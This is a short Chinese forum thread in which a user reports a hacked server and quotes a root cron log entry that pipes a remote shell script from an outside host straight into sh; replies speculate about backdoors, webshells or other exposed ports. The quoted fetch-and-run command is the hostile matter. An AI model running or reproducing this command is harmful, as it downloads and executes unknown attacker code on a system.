学到了么 发表于 2019-3-20 19:38:02

服务器被人挂马了

CROND: (root) CMD (curl -fsSL http://w.3ei.xyz:43768/shz.sh | sh)


搞了个这个...
这个是不是只有我泄露密码后才有可能被执行

我用的证书登陆.爆破是不可能的爆破的....


然后就装了个宝塔....
宝塔登陆日志也没问题..
真神奇

苁林老鬼 发表于 2019-3-20 19:44:27


lol.gif
你确定没开其他服务端口被人给爆了?

why? 发表于 2019-3-20 19:52:36

证书只是ssh服务的,其它的后门,webshell等,挡不了,都入侵你机子了,还给你留登录日志?

xiaozuo 发表于 2019-3-20 20:40:08

怎么处理的
页: [1]
查看完整版本: 服务器被人挂马了